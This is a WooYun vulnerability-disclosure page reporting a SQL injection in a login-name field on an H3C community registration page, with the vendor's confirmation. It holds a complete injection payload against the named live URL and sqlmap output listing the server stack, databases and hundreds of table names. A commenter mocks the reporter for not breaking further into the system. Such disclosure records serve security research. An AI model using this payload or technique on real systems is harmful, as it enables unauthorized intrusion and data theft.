当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096781

漏洞标题:华三某系统存在POST注入问题

相关厂商:华三通信

漏洞作者: 路人甲

提交时间:2015-02-14 10:12

修复时间:2015-03-31 10:14

公开时间:2015-03-31 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-14: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经确认,细节仅向厂商公开
2015-02-25: 细节向核心白帽子及相关领域专家公开
2015-03-07: 细节向普通白帽子公开
2015-03-17: 细节向实习白帽子公开
2015-03-31: 细节向公众公开

简要描述:

呃...应该没重复吧?

详细说明:

http://h3community.h3c.com:80/Member/RegistrationPage.aspx
注册页面 txtLoginName存在POST注入

漏洞证明:

Parameter: txtLoginName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwULLTE1MDQyNjUwMTcPZBYCAgMPZBYgAgMPZBYCAh8PDxYCHgdWaXNpYmxlZ2RkAgcPDxYCHgxFcnJvck1lc3NhZ2UFHENvbXBhbnkgTmFtZSBNaXNzaW5nICBJbnB1dCFkZAILDw8WAh8BBRROYW1lIE1pc3NpbmcgIElucHV0IWRkAg8PDxYCHwEFFVRpdGxlIE1pc3NpbmcgIElucHV0IWRkAhMPDxYCHwEFGVRlbGVwaG9uZSBNaXNzaW5nICBJbnB1dCFkZAIXDw8WAh8BBRxNb2JpbGUgUGhvbmUgTWlzc2luZyAgSW5wdXQhZGQCGw8PFgIfAQUbQ28uIGFkZHJlc3MgTWlzc2luZyAgSW5wdXQhZGQCHw8PFgIfAQUTRmF4IE1pc3NpbmcgIElucHV0IWRkAiMPDxYCHwEFFUVtYWlsIE1pc3NpbmcgIElucHV0IWRkAiQPDxYCHwEFDEVtYWlsIFdyb25nIWRkAigPDxYCHwEFGkxvZ2luIE5hbWUgTWlzc2luZyAgSW5wdXQhZGQCKg8PFgIfAQUiTWluaW11bSA2IEFscGhhbnVtZXJpYyBDaGFyYWN0ZXJzIWRkAiwPDxYCHgdFbmFibGVkaGRkAi4PDxYCHgRUZXh0ZWRkAjAPDxYCHwJnZGQCMg8WAh4IZGlzYWJsZWQFCGRpc2FibGVkZGQxn310x8n+6Yu92XB+lZvtoDt4uw==&txtCompany=KHfj&txtName=&txtTitle=bHNY&txtTelephone=&txtMobilePhone=kIww&txtAddress=&txtFax=SLrR&txtEmail=&txtLoginName=SFCg' AND 4133=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4133=4133) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'TxaM'='TxaM&btAgree=Agree&__EVENTVALIDATION=/wEWDALcjoebCgKXv9ziDwLEhISFCwL55JyzBAK287TlCgLm4ZKMBALv7ITZAgKH+/LHDgKE8/26DAKpwK/OBgLm+tPhCwLoqK/YB3GaXn478AtSlYagT+j7eMS84oUv
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user is DBA: False
available databases [9]:
[*] CMS2007_Admin_DB
[*] CMS2007_Portal_DB
[*] CMS2007_Portal_DB_CN
[*] COPYTS
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb
Database: CMS2007_Admin_DB
[724 tables]
+--------------------------------------------------+
| ADDRESS |
| AGENT_JOB |
| AGENT_JOBTYPE |
| AGENT_LOG |
| AGENT_SCHE |
| AP_AUTH_AccreditRejectReason |
| AP_AUTH_Agent1Company |
| AP_AUTH_AgentApplyRecord |
| AP_AUTH_AgentApplyRecordVW |
| AP_AUTH_AgentCertPrint_VW |
| AP_AUTH_AgentCertificate |
| AP_AUTH_AgentUpgradeApproveHistory |
| AP_AUTH_AgentUpgradeEstimate |
| AP_AUTH_ApplyProductLine |
| AP_AUTH_ApplyProductLine140423 |
| AP_AUTH_ApplyProductLine20100507 |
| AP_AUTH_ApplyProductLine20120317 |
| AP_AUTH_ApplyProductLineIndustryVW |
| AP_AUTH_ApplyProductLineVW |
| AP_AUTH_AreaAndAuthor |
| AP_AUTH_AreaAndAuthorVW |
| AP_AUTH_AttentionProductLine |
| AP_AUTH_Auth |
| AP_AUTH_Auth140423 |
| AP_AUTH_Auth20120317 |
| AP_AUTH_AuthAgentLevelQueryExportExcelVW |
| AP_AUTH_AuthHistory |
| AP_AUTH_AuthIndustryVW |
| AP_AUTH_AuthQueryExportExcelVW |
| AP_AUTH_BaseInfo |
| AP_AUTH_BaseInfo20131218 |
| AP_AUTH_BaseInfoHistory |
| AP_AUTH_BaseInfoQueryVW |
| AP_AUTH_BaseInfo_20111021 |
| AP_AUTH_BaseInfo_20140507 |
| AP_AUTH_CertificateDatum |
| AP_AUTH_ComanyGroupVW |
| AP_AUTH_CommunicateTable |
| AP_AUTH_CooperatePlan |
| AP_AUTH_CoverSaleArea |
| AP_AUTH_CoverSaleProvinceVW |
| AP_AUTH_DDQDataInfo |
| AP_AUTH_DDQDataInfo20140314 |
| AP_AUTH_EngineerCertificate |
| AP_AUTH_EngineerCertificateVW |
| AP_AUTH_ExportExcelProductLineAllVW |
| AP_AUTH_FilesRejectAndProductLine |
| AP_AUTH_FilesRejectReason |
| AP_AUTH_Industry |
| AP_AUTH_InteCoverIndustryVW |
| AP_AUTH_IntegrationCoverIndustry |
| AP_AUTH_IntegrationProject |
| AP_AUTH_IntegrationStrength |
| AP_AUTH_MostlyProduct |
| AP_AUTH_MostlyProductVW |
| AP_AUTH_OnlineSurvey |
| AP_AUTH_PartnerQueryForScore |
| AP_AUTH_PartnerQueryVW |
| AP_AUTH_PostSaleEngineer_Test |
| AP_AUTH_ProductContact |
| AP_AUTH_ProductContact_backUp |
| AP_AUTH_ProductLineArea |
| AP_AUTH_Protocols |
| AP_AUTH_Sale |
| AP_AUTH_SaleOA |
| AP_AUTH_SalesFiliation |
| AP_AUTH_SalesNet |
| AP_AUTH_SeperateSaleAbility |
| AP_AUTH_SignProtocolVW |
| AP_AUTH_TempAccount |
| AP_AUTH_ThreeYearSales |
| AP_AppAdapter |
| AP_CDIP_AGENTCODE |
| AP_CDIP_AGENTLEVEL |
| AP_CD_AgentCertificate |
| AP_CD_Area |
| AP_CD_AuthStatus |
| AP_CD_AuthStatus_BackUp |
| AP_CD_AuthType |
| AP_CD_BULeaderEMailsVW |
| AP_CD_CertClassify |
| AP_CD_CertProperty |
| AP_CD_CertificateType |
| AP_CD_City |
| AP_CD_CompanyType |
| AP_CD_EFlowType |
| AP_CD_EVENTTYPE |
| AP_CD_EcosystemType |
| AP_CD_EduCertType |
| AP_CD_GroupRights |
| AP_CD_Industry |
| AP_CD_Industry2 |
| AP_CD_Industry3 |
| AP_CD_IntegrationIdentity |
| AP_CD_MainWork |
| AP_CD_Office |
| AP_CD_Oppstyle |
| AP_CD_Product |
| AP_CD_ProductLevel |
| AP_CD_ProductLevel_Group |
| AP_CD_ProductLine |
| AP_CD_ProductLineStatus |
| AP_CD_ProviceAndOffice |
| AP_CD_ProviceAndOfficeVW |
| AP_CD_Province |
| AP_CD_ProvinceAndOACity |
| AP_CD_ProvinceVW |
| AP_CD_SaleProvince |
| AP_CD_ServiceLevel |
| AP_CD_ServiceProductLine |
| AP_CD_Standard |
| AP_CD_TrainCenterType |
| AP_CD_UserAndOffice |
| AP_CD_User_ProductLine |
| AP_CHANNEL_BALEFUL_ARREARAGE |
| AP_CHANNEL_BEAR_PALM |
| AP_CHANNEL_BRIEF_LIST |
| AP_CHANNEL_BRIEF_LIST_History |
| AP_CHANNEL_CreditEvalRelsult |
| AP_CHANNEL_ET_APPLY_PAY_SCHEDU |
| AP_CHANNEL_ET_INDUSTRY_PLAN |
| AP_CHANNEL_ET_OTHERINFO |
| AP_CHANNEL_ET_SALES_PROMOTION |
| AP_CHANNEL_OTHER_KEY_INFO |
| AP_CHANNEL_OUT_OF_LINE |
| AP_CHANNEL_QUARTER_CALCULATE |
| AP_CHANNEL_QUARTER_RETURN_POIN |
| AP_CHANNEL_TBSOAGENT1WEEK |
| AP_CHANNEL_TBSOHODETAIL |
| AP_CHANNEL_TBSOHOPROJECTCONTRA |
| AP_CMS_Rights |
| AP_CPMS_AuthVW |
| AP_CPMS_BaseInfoVW |
| AP_CPMS_CertifiedWinner |
| AP_CPMS_CertifiedWinnerDetail |
| AP_CPMS_ProductContactDiffDataVW |
| AP_CPMS_ProductContactVW |
| AP_CPMS_TSAgentVW |
| AP_Channel_Black_List |
| AP_Channel_Black_List_History |
| AP_EDU_800CallBack |
| AP_EDU_CertAndScore |
| AP_EDU_CertStar |
| AP_EDU_Certificate |
| AP_EDU_Certificate20141216 |
| AP_EDU_CertificateSetting |
| AP_EDU_CertificateStarVW |
| AP_EDU_CertificateVW |
| AP_EDU_CnStuResume |
| AP_EDU_Cntester |
| AP_EDU_CntesterStarVW |
| AP_EDU_Cntester_100810_verify |
| AP_EDU_Cntester_bak_20100818 |
| AP_EDU_Cntester_temp20100818 |
| AP_EDU_CombinDetail |
| AP_EDU_Course |
| AP_EDU_CourseAndCourseDetailRelation |
| AP_EDU_CourseCombineWay |
| AP_EDU_CourseDetail |
| AP_EDU_Dictionary |
| AP_EDU_Exam |
| AP_EDU_ExamBooking |
| AP_EDU_ExportExcelTesterCertificateVW |
| AP_EDU_H3CE_BookOnlineLectures |
| AP_EDU_H3CE_CDCode |
| AP_EDU_H3CE_Certificate |
| AP_EDU_H3CE_Certificate11_3 |
| AP_EDU_H3CE_Cntester |
| AP_EDU_H3CE_OnlineLectures |
| AP_EDU_H3CE_Score |
| AP_EDU_HCNAData |
| AP_EDU_HWSEQ |
| AP_EDU_JobsCompanyInfo |
| AP_EDU_JobsInfo |
| AP_EDU_JobsNewInfo |
| AP_EDU_JobsPostInfo |
| AP_EDU_Lesson |
| AP_EDU_LessonInfo |
| AP_EDU_Lesson_2013_6_7 |
| AP_EDU_Lesson_2013_6_7_bak |
| AP_EDU_NewCertStarVW |
| AP_EDU_Project |
| AP_EDU_Project_DepenDon |
| AP_EDU_QU_ItemSelection |
| AP_EDU_QU_Paper |
| AP_EDU_QU_PaperQuestion |
| AP_EDU_QU_Question |
| AP_EDU_QU_QuestionItem |
| AP_EDU_QU_Response |
| AP_EDU_QU_ResponsePaper |
| AP_EDU_ResumeInfo |
| AP_EDU_SatisfactionVW |
| AP_EDU_SignUp |
| AP_EDU_Student |
| AP_EDU_StudentInLesson |
| AP_EDU_StudentInLesson_2013_6_7 |
| AP_EDU_StudentInLesson_2013_6_7_bak |
| AP_EDU_Teach_Aptitudes |
| AP_EDU_Teach_Auth |
| AP_EDU_Teach_Practice |
| AP_EDU_Teach_Reward |
| AP_EDU_Teach_Teach |
| AP_EDU_Teach_Test |
| AP_EDU_Teach_Train |
| AP_EDU_Teach_Train2 |
| AP_EDU_Teach_Work |
| AP_EDU_Teach_ZZ |
| AP_EDU_Teacher |
| AP_EDU_TeacherExamScore |
| AP_EDU_TesterExamScore |
| AP_EDU_Tqd_Mark |
| AP_EDU_TrainBooking |
| AP_EDU_TrainCenter |
| AP_EDU_TrainManInfo |
| AP_EDU_TrainNeed |
| AP_EDU_TrainStudentsNetVW |
| AP_EDU_TrainStudentsVW |
| AP_EDU_TrainingCenterProject |
| AP_EDU_TrainingCenter_NianFei |
| AP_EDU_TrainingCenter_SheBei |
| AP_EDU_TrainingCenter_ShiZi |
| AP_EDU_TrainingCenter_ZhangHu |
| AP_EDU_TrainingProject |
| AP_EDU_TrainingProjectLimited |
| AP_EDU_TrainingSatisfaction |
| AP_EDU_TrainingSatisfaction20100318 |
| AP_EDU_WebMatch_Court |
| AP_EDU_WebMatch_Info |
| AP_EDU_WebMatch_RegInfo |
| AP_EDU_WebMatch_Student |
| AP_EDU_WebMatch_Student20140305 |
| AP_EDU_WebMatch_User |
| AP_EXPERT_QuestionAndAnswer |
| AP_EXPERT_QuestionAndAnswerVW |
| AP_EXPERT_Theme |
| AP_EXP_AtachFile |
| AP_EXP_HistoryInfo |
| AP_EXP_ProjBasicInfo |
| AP_GENERAL_DOCUMENT |
| AP_NOTES_BaseInfoVW |
| AP_OperatorLog |
| AP_PagePart |
| AP_PagePartProperty |
| AP_QK_Magazine |
| AP_QK_Subscribe |
| AP_QK_User |
| AP_SUN_ACEvaluationInfo |
| AP_SUN_ACPSInfo |
| AP_SUN_ACPayApplyInfo |
| AP_SUN_ACReaApplyInfo |
| AP_SUN_ADPayApplyInfo |
| AP_SUN_ADReqApplyInfo |
| AP_SUN_AcadAcount |
| AP_SUN_AcountInfo |
| AP_SUN_AttachInfo |
| AP_SUN_BasicInfo |
| AP_SUN_BedgetInfo |
| AP_SUN_FlowInfo |
| AP_SUN_MagDetialInfo |
| AP_SUN_MailTargetInfo |
| AP_TS_AgentEngineer |
| AP_TS_AgentEngineerAccount |
| AP_TS_AgentEngineerAccountVW |
| AP_TS_AgentEngineerAccountVW1 |
| AP_TS_AgentEngineerCertifacate |
| AP_TS_AgentEngineerCertifacateVW |
| AP_TS_AgentEngineer_temp |
| AP_TS_AgentManager |
| AP_TS_ApplyBaseInfo |
| AP_TS_ApplyBaseInfoBefore |
| AP_TS_ApplyBaseInfoBeforeVW |
| AP_TS_ApplyBaseInfoHistory |
| AP_TS_ApplyService |
| AP_TS_ApplyServiceDatum |
| AP_TS_ApplyServiceHistory |
| AP_TS_ApplyService_temp |
| AP_TS_Engineer |
| AP_TS_Engineer20130504 |
| AP_TS_LAB |
| AP_TS_SMBdata |
| AP_TS_ServiceCommissionInfo |
| AP_TS_ServiceManageInfo |
| AP_TS_ServiceManageInfo2013514 |
| AP_TS_StarStand |
| AP_TS_TEST |
| AP_TS_TESTEVENT |
| AP_TS_TESTKEYEVENT |
| AP_TS_TESTVW |
| AP_TS_serviceLab |
| AP_TS_serviceLab_temp |
| AgentFreezing |
| AllDealerBaseInfoVW |
| AllProductLineVW |
| ApplyUserRightVW |
| BD_ChannelInfo |
| BD_DelDocumentInfo |
| BD_DocCenter |
| BD_DocumentInfo |
| CMSLog |
| CMSLog4Email |
| CMS_APPCONF |
| CMS_CHANNELS |
| CMS_CHANNELS_20131018 |
| CMS_CH_TPL |
| CMS_CONSTANTS |
| CMS_Channels_Recycle |
| CMS_DATASOURCES |
| CMS_DATASRC_MAP |
| CMS_DEP |
| CMS_DISTCONF |
| CMS_DISTSCHE |
| CMS_DIST_LANGUAGE |
| CMS_DOCFIELD |
| CMS_DOCFILETYPE |
| CMS_DOCFILTER_KEYWORDS |
| CMS_DOCFILTER_KEYWORDSCATS |
| CMS_DOCMAIN |
| CMS_DOCMAIN_History |
| CMS_DOCMAIN_Old |
| CMS_DOCTEXT |
| CMS_DOCTEXT_BackUp_DeleteData |
| CMS_DOCTEXT_History |
| CMS_DOCTYPE_INFOTAG |
| CMS_DOCTYPE_RULE |
| CMS_DOC_ACC |
| CMS_DOC_ACC_BackUp_DeleteData |
| CMS_DOC_CH |
| CMS_DOC_INFOTAG |
| CMS_DOC_KEYWORDS |
| CMS_DOC_RELATDOC |
| CMS_Doc_Atr |
| CMS_Docmain_Recycle |
| CMS_FD_CH |
| CMS_FD_CH_20131018 |
| CMS_FD_SRC |
| CMS_FOLDERS |
| CMS_FOLDERS_20131018 |
| CMS_Function |
| CMS_GROUPS |
| CMS_GROUP_CH |
| CMS_GROUP_FD |
| CMS_GROUP_USER |
| CMS_Group |
| CMS_GroupRole |
| CMS_INFOTAG |
| CMS_KEYWORDCATS |
| CMS_KEYWORDS |
| CMS_PLACEHOLDER |
| CMS_RESFILE |
| CMS_RESFOLD |
| CMS_ROLE_RIGHTS |
| CMS_RelationShip |
| CMS_Resource |
| CMS_ResourceType |
| CMS_Right |
| CMS_Role |
| CMS_RoleFunction |
| CMS_SPEC_DOCS |
| CMS_STATUS_ACTION |
| CMS_SVRCONF |
| CMS_TEMPLATES |
| CMS_TEMPLATES_20141112 |
| CMS_TEMPLATES_20141201 |
| CMS_TPL_CH_Relations |
| CMS_TPL_DEPEND |
| CMS_TPL_DEPEND_20131018 |
| CMS_TPL_INDEX |
| CMS_TPL_ReTPL_Relations |
| CMS_TagCache |
| CMS_USERS |
| CMS_User |
| CMS_UserGroup |
| Cms_Fd_Relation |
| Cms_Keyword |
| Cms_KeywordCategory |
| Cms_sharedoc_Relation |
| CompanyAdminVW |
| CompanyMemberCanApplyGroupVW |
| DB_UPDATE |
| DEPARTMENT |
| DailyReport |
| EP_Document |
| EP_Member |
| EP_PointRecord |
| EP_Prize |
| EP_PrizeRedemption |
| EP_Product |
| EP_ProductAndCategory |
| EP_ProductCategory |
| EP_Project |
| EP_ProjectDetail |
| Hotword |
| MSpeer_lsns |
| MSpeer_request |
| MSpeer_response |
| MSpub_identity_range |
| NT_Agent |
| NT_EmailInfo |
| NT_Log |
| NT_NewProduct_Auth_Items |
| NT_NewProduct_TrainAndAuth_Booking_Auths |
| NT_NewProduct_TrainAndAuth_Booking_Auths0709 |
| NT_NewProduct_TrainAndAuth_Booking_Members |
| NT_NewProduct_TrainAndAuth_Booking_Trains |
| NT_NewProduct_TrainAndAuth_ClassPlan |
| NT_NewProduct_TrainAndAuth_ClassPlan2 |
| NT_NewProduct_TrainAndAuth_Contract |
| NT_NewProduct_Train_Items |
| NT_Province |
| NT_YQH |
| NeedDistChannelsList |
| Portal_Group_Res |
| Portal_Groups |
| Portal_ResourceUrl |
| Portal_User_Group |
| Portal_Users |
| ProxyAccout |
| PublishFiles |
| Report_UpdatedTemplates |
| SITE_MENUCF |
| ScoreFdPath |
| Sheet11$ |
| Sheet12$ |
| SiteLog |
| TempCatalogVW |
| TempFreezeVW |
| TempFreezeVW625 |
| Temp_AP_CPMS_CertifiedWinner |
| Training_Department_List |
| TypeLog |
| UpdateDataTable |
| UpdateOACity |
| VNT_NewProduct_TrainAndAuth_AgentLevel |
| VNT_NewProduct_TrainAndAuth_Booking_AuthMembers |
| VNT_NewProduct_TrainAndAuth_Booking_TrainMembers |
| View_AP_CPMS_CertifiedWinner |
| agentTable |
| ap_auth_protocols20100623 |
| backup_tbqueueemail |
| cdFAQSubType |
| chem_infotypes |
| chem_maillog |
| cms_DelFolderAndDocLate |
| cms_RelationShip_20131018 |
| cms_ch_tpl_tmp |
| cms_doc_audit |
| cms_docrp_rs |
| cms_siteconf |
| cms_tpl_depend_tmp |
| cms_user201418 |
| con_group_user |
| con_groups |
| con_res_auth |
| con_roles |
| con_users |
| dongjie |
| dtproperties |
| fk |
| h3cCareClubServiceManage |
| ketmp_template_20141222_01 |
| ktemp_cms_folders20150115_01 |
| ktemp_template_20141202_01 |
| ktemp_template_20141203_01 |
| ktemp_template_20141203_02 |
| ktemp_template_20141211_01 |
| ktemp_template_20141211_02 |
| ktemp_template_20141219_01 |
| ktemp_template_20141222_02 |
| ktemp_template_20141222_03 |
| ktemp_template_20141222_04 |
| ktemp_template_20141222_05 |
| ktemp_template_20141223_01 |
| ktemp_template_20141223_02 |
| ktemp_template_20141224_01 |
| ktemp_template_20141224_02 |
| ktemp_template_20141224_03 |
| ktemp_template_20141225_01 |
| ktemp_template_20141225_02 |
| ktemp_template_20141229_01 |
| ktemp_template_20150107_01 |
| ktemp_templates20150205_01 |
| ktemp_templates20150205_02 |
| ktemp_templates20150205_03 |
| ktemp_templates20150205_04 |
| ktemp_templates20150206_01 |
| ktemp_templates20150206_02 |
| ktemp_templates20150206_03 |
| ktemp_templates20150206_04 |
| ktemp_templates20150206_05 |
| ktemp_templates20150206_06 |
| ktemp_templates20150206_07 |
| ktemp_templates20150206_08 |
| ktemp_templates20150206_09 |
| ktemp_templates20150206_10 |
| ktemp_templates20150206_11 |
| ktemp_templates20150206_12 |
| ktemp_templates20150206_13 |
| ktemp_templates20150206_14 |
| ktemp_templates20150209_01 |
| ktemp_templates_20150109_01 |
| mail_address |
| mail_mailfolder |
| mail_parameter |
| poll_Option |
| poll_Question |
| poll_Topic |
| poll_Vote |
| poll_Vote_Answer |
| servicenotpasstemp |
| servicenotpasstemp1 |
| servicepasstemp |
| servicepasstemp1 |
| struct_mutile_default |
| struct_single_default |
| syncobj_0x3131344533424539 |
| syncobj_0x3133443032323639 |
| syncobj_0x3142334345433135 |
| syncobj_0x3145393834423546 |
| syncobj_0x3145453746334534 |
| syncobj_0x3232333946453139 |
| syncobj_0x3239433442453230 |
| syncobj_0x3333443236343530 |
| syncobj_0x3335393231394545 |
| syncobj_0x3346433037413030 |
| syncobj_0x3346443733383341 |
| syncobj_0x3431343343344436 |
| syncobj_0x3433384633303334 |
| syncobj_0x3531363543394541 |
| syncobj_0x3531364634303942 |
| syncobj_0x3541303537354342 |
| syncobj_0x3545384230333232 |
| syncobj_0x3638393734313132 |
| syncobj_0x3733334632424432 |
| syncobj_0x3734413132354544 |
| syncobj_0x3838384339333534 |
| syncobj_0x3843393045434632 |
| syncobj_0x3932303436443831 |
| syncobj_0x3934443744373332 |
| syncobj_0x3936433731414644 |
| syncobj_0x3937334639303335 |
| syncobj_0x3941413742393732 |
| syncobj_0x4132443342384639 |
| syncobj_0x4142453538324243 |
| syncobj_0x4144444137364446 |
| syncobj_0x4146454145413642 |
| syncobj_0x4235444331443530 |
| syncobj_0x4237443534393037 |
| syncobj_0x4238383338413344 |
| syncobj_0x4239313730344334 |
| syncobj_0x4246393846383936 |
| syncobj_0x4246453336463342 |
| syncobj_0x4344454144383532 |
| syncobj_0x4345373330433237 |
| syncobj_0x4345394335464546 |
| syncobj_0x4434384631354430 |
| syncobj_0x4434443038363145 |
| syncobj_0x4442333034303746 |
| syncobj_0x4443464235373034 |
| syncobj_0x4541324433434438 |
| syncobj_0x4541383133314139 |
| syncobj_0x4542303334334237 |
| syncobj_0x4641383538363035 |
| syncobj_0x4641394537443645 |
| syncobj_0x4641463337413631 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| tbAppAuthorizationBase |
| tbAppAuthorizationWithGroup |
| tbAppProductBase |
| tbArticleScore |
| tbAutherChannel |
| tbBaseInfoAddressTemp |
| tbBaseInfoContactorTemp |
| tbBroadDoc |
| tbBroadGroup |
| tbBroadUser |
| tbBroadUserInterest |
| tbBusinessTypeBase |
| tbChannelFlowInfo |
| tbChannelFlowInfoVW |
| tbCompany |
| tbContactList |
| tbContactTypeBase |
| tbContinentAndCountryBase |
| tbCountryArea |
| tbCountryForPartnerApp |
| tbDelContactorTemp |
| tbDocLinkReportTotal |
| tbDynamicPage |
| tbEventVisitor |
| tbEventWithVisitor |
| tbFAQ |
| tbFAQTypeBase |
| tbFolder |
| tbFolderIDWithSaveRootPath |
| tbGroupUpgradeRule |
| tbHaveAuthorGroup |
| tbHideChannel |
| tbHotKeywords |
| tbIVSApplyInfo |
| tbIVSAuditInfo |
| tbIndustryBase |
| tbIntelApplyInfo |
| tbKeyNetworkingBase |
| tbMailList |
| tbMajorProject |
| tbMarketActivites |
| tbMarketScore |
| tbMarketScore_1 |
| tbMessageGroup |
| tbMessageUser |
| tbMessageUserWithGroup |
| tbMessageUser_20120424 |
| tbMobile_DocmainComments |
| tbMobile_FileFolder |
| tbMobile_PortalUserFeedbacks |
| tbMobile_PortalUserScores |
| tbMobile_ProductCategory |
| tbMobile_ProductSeries |
| tbMobile_ProductVersion |
| tbMobile_Products |
| tbMobile_TopicFolder |
| tbMyH3C |
| tbMyH3C_Group |
| tbMyH3C_Type |
| tbOAAPartnerInfo |
| tbPortalApproveApplication |
| tbPortalChannelRights |
| tbPortalFunctionLog |
| tbPortalGroupApproveLevel |
| tbPortalGroupCommonUser |
| tbPortalGroupCommonUser_2013_05_13 |
| tbPortalGroupEmployee |
| tbPortalGroupEmployee_2013_05_13 |
| tbPortalGroupStudent |
| tbPortalGroupStudent_2013_05_13 |
| tbPortalGroupUser |
| tbPortalGroupUser_2013_05_13 |
| tbPortalGroups |
| tbPortalGroupsResource |
| tbPortalLog |
| tbPortalResRights |
| tbPortalTraceLog |
| tbPortalUsers |
| tbPortalUsers20121026 |
| tbPortalUsersAndMobile |
| tbPortalUsersAttribute |
| tbPortalUsers_20111021 |
| tbPortalUsers_2013_05_13 |
| tbProductBase |
| tbProductContactorTemp |
| tbPublishSite |
| tbQueueEmail |
| tbQueueEmailAccessories |
| tbQueueEmailAccessoriesHistory |
| tbQueueEmailHistory |
| tbQueueTask |
| tbQueueTaskHistory |
| tbSSO_AdminTask |
| tbSSO_CPPS_Agency |
| tbSSO_CPPS_Agency1 |
| tbSSO_Employee |
| tbSSO_FieldMap |
| tbSSO_KMS_Proviences_Cities |
| tbSSO_Log |
| tbSSO_LogoutUrl |
| tbSSO_Queue |
| tbSSO_QueueHistory |
| tbSSO_SPMS_Proviences_Cities |
| tbSSO_ShareSession |
| tbSSO_UserMap |
| tbScore |
| tbSiteChannels |
| tbSwitchProduct |
| tbTimeZoneBase |
| tbUploadBatch |
| tbUploadBatchNew |
| tbUserInfTemp |
| tbUserValidate |
| tbUserWithCompany |
| tbUserWithEventVisitor |
| tbVedioFile |
| tbVedioFileNew |
| tbVedioSaveRootPath |
| tb_UserLoginLog |
| tbportalResource |
| tbportalgroupuser20110517 |
| tbsso_ClientSite |
| tempAP_AUTH_ApplyProductLine5_22 |
| tempAP_AUTH_Auth5_22 |
| tempAP_AUTH_BaseInfo5_22 |
| temp_AP_CPMS_CertifiedWinnerDetail |
| temp_acc_url |
| temp_agentuser |
| temp_aspxstatistic |
| temp_aspxstatistic1 |
| temp_backup_templates |
| temp_doctext140331 |
| vFolderPower |
| viewPortalUsersResource |
| vwGetAproveDocCh |
| vw_EduInface_Certificate |
| vw_EduInface_ExamScore |
| vw_EventVisitorByEventID |
| vw_EventWithUsers |
| vw_GetFullVedioInfo |
| vw_GetFullVedioInfoNew |
| vw_GetMessageUserFullInfo |
| vw_GetVisitorDetail |
| vw_GroupUpgradeRaletionShip |
| vw_PartnerAppInfo |
| vw_showUsersAndGroups |
| vwp_content |
| wp_channels |
| wp_content |
| yxyVerify |
+--------------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-02-15 14:33

厂商回复:

经查该漏洞确实存在,已经知会相关人员处理。感谢您对H3C的关注,以及对H3C信息安全辛苦的付出!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-14 10:53 | jianFen ( 普通白帽子 | Rank:530 漏洞数:83 | 避其锋芒,剑走偏锋)

    呵呵 这么急 延迟注入 系统都不打进入 就提交